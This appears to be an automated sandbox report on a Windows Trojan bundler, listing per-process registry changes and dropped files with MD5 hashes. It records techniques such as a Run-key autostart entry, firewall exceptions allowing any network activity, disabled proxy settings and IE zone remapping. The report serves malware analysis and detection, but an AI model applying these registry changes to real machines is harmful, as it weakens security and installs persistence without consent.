[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\tyoh]
"et" = "2920146"

The process %original file name%.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\闪电浏览器]
"DisplayName" = "闪电浏览器"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..]
"F30241_s_0523.exe" = "百度杀毒安装程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..]
"pczh_98_2.exe" = "pczh_98_2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\闪电浏览器]
"Publisher" = "闪电"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\闪电浏览器]
"URLInfoAbout" = "http://www.sd.com"
"DisplayIcon" = "%Program Files%\shandian\shandian.exe"
"UninstallString" = "%Program Files%\shandian\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..]
"ionrkf_70688.exe" = "ionrkf_70688"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\闪电浏览器]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 40 A4 4D F4 CD 40 BE EC 05 61 05 B4 2F B7 2C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..]
"dudu_b_55045.exe" = "安装包程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes that have no dots in their names and do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sdad.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 78 BB 29 F2 40 AC 65 60 84 7D 94 B7 74 D6 02"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes that have no dots in their names and do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dudu_b_55045.exe:668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED F0 79 6C 84 2C FD A5 8F E6 F9 8C A9 52 EF 8D"

The process F30241_s_0523.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\AppID\ieCommonPlugin.DLL]
"AppID" = "{6B4447CA-C33E-4E65-914D-C7B346D73F80}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDate" = "2014-6-29"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\VersionIndependentProgID]
"(Default)" = "ieCommonPlugin.Implement"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\TypeLib]
"(Default)" = "{9A93865B-4314-47AE-8C4A-850748CCC6BF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"UninstallString" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"Version" = "1.8.0.1255"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayVersion" = "1.8.0.1255"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\iexplore\AllowedDomains\*]
"(Default)" = ""

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"vendor" = "Beijing baidu Netcom science and technology co.ltd"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\ProgID]
"(Default)" = "ieCommonPlugin.Implement.1"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin\MimeTypes\application/np-BaiduSDDetect]
"Description" = "BaidusdDetectNPPlugin"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\ieCommonPlugin.Implement]
"(Default)" = "Implement Class"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Path" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"Publisher" = "百度在线网络技术(北京)有限公司"

[HKCR\ieCommonPlugin.Implement\CurVer]
"(Default)" = "ieCommonPlugin.Implement.1"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"ProductName" = "BaiduSd"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag" = "273"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\ieCommonPlugin.Implement\CLSID]
"(Default)" = "{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDir" = "%Program Files%\Baidu\BaiduSd"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}]
"(Default)" = "Implement Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayIcon" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}]
"(Default)" = "IImplement"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\AppID\{6B4447CA-C33E-4E65-914D-C7B346D73F80}]
"(Default)" = "ieCommonPlugin"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 3F AB 9F 67 44 DF 80 AB D3 DE 7C 71 46 D4 68"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Description" = "Baidusd detect NPAPI plugin"

[HKLM\System\CurrentControlSet\Control\CrashControl]
"CrashDumpEnabled" = "2"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayName" = "百度杀毒1.8"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"VirusTime" = "2013.11.28 0110"

[HKCR\ieCommonPlugin.Implement.1\CLSID]
"(Default)" = "{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCR\ieCommonPlugin.Implement.1]
"(Default)" = "Implement Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0]
"(Default)" = "ieCommonPlugin 1.0 Type Library"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Version" = "1.0.0.1"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\TypeLib]
"(Default)" = "{9A93865B-4314-47AE-8C4A-850748CCC6BF}"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"SupplyID" = "30241"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\InprocServer32]
"ThreadingModel" = "Apartment"

The Trojan adds the executable file of the process it runs in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp]
"F30241_s_0523.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\F30241_s_0523.exe:*:Enabled:百度杀毒安装程序"

Adds a rule to the Windows Firewall which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp]
"F30241_s_0523.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\F30241_s_0523.exe:*:Enabled:百度杀毒安装程序"

The process BDDownloader.exe:3960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 C7 46 5A 83 2C E7 A3 24 1B D3 4C C9 5D 14 FF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\program files\common files\baidu\bddownload\106]
"bddownloader.exe" = "百度高速下载引擎"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes that have no dots in their names and do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process BDDownloader.exe:3520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 DA 72 1B 22 28 1E 5E 2B 56 6F C4 2C 8D 96 BF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

The process regsvr32.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 F5 9B 7E D3 14 83 24 55 64 B9 1D 36 A3 6B 5F"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bdcomproxy.dll"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

The process BDKVWsc.exe:2740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD DA 5F 44 6E 16 F5 01 45 18 33 CC BF 15 4C BE"

The process RegSvr32.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 C5 CA 1D 65 BA 25 69 A1 06 DA 4B C7 77 22 6F"

The process RegSvr32.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0]
"(Default)" = "BDShellExt 1.0 Type Library"

[HKCR\BDShellExt.BDShellExtMenu\CurVer]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\NumMethods]
"(Default)" = "3"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}]
"(Default)" = "IBDShellExtMenu"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\BDShellExt.BDShellExtMenu.1]
"(Default)" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu]
"(Default)" = "BDShellExtMenu Class"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\lnkfile\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\AppID\BDShellExt.DLL]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00890530-6A9F-4be2-B1BB-73F01E2BB986}" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\TypeLib]
"(Default)" = "{45D1EEF3-7713-48fa-B7A5-B77229C7D330}"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\TypeLib]
"(Default)" = "{45D1EEF3-7713-48FA-B7A5-B77229C7D330}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\VersionIndependentProgID]
"(Default)" = "BDShellExt.BDShellExtMenu"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\ProgID]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\AllFilesystemObjects\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}]
"(Default)" = "PSFactoryBuffer"

[HKCR\AppID\{FBE0E29B-01DB-4876-B147-46F5AABA6823}]
"(Default)" = "BDShellExt"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\InProcServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED E9 F2 00 36 F2 B8 8E 59 ED 84 17 F9 EC D1 D6"

[HKCR\Folder\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
"(Default)" = "BDShellExtMenu Class"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\HELPDIR]
"(Default)" = ""

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\InprocServer32]
"ThreadingModel" = "Apartment"

The process ionrkf_70688.exe:280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 7F 2F A3 BD E2 12 0E D1 DF 65 46 29 CE AA DB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\metnsd\clsid]
"SequenceID" = "99 A8 94 38 5A 89 70 4A AB 26 83 6B BF 13 26 02"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

Adds a rule to the Windows Firewall which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp]
"ionrkf_70688.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\ionrkf_70688.exe:*:Enabled:百度卫士在线安装程序"

The Trojan adds the executable file of the process it runs in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp]
"ionrkf_70688.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\ionrkf_70688.exe:*:Enabled:百度卫士在线安装程序"

Dropped PE files

MD5 File path
a7d710e78711d5ab90e4792763241754 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nslB3.tmp\Md5dll.dll
00a0194c20ee912257df53bfe258ee4a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nslB3.tmp\System.dll
e2b78c96162ad8c36a623e6a4ba1c216 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nslB3.tmp\bind.dll
3a5ed71aa9c6846d95d57235c4c443d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nslB3.tmp\xID.dll
8f87437f10cd1ae1d2e8a16c74edb3bd c:\Program Files\shandian\bin\sdad.exe
14748083682ed1f9ef1dc28bb609050a c:\Program Files\shandian\bin\shandian.exe
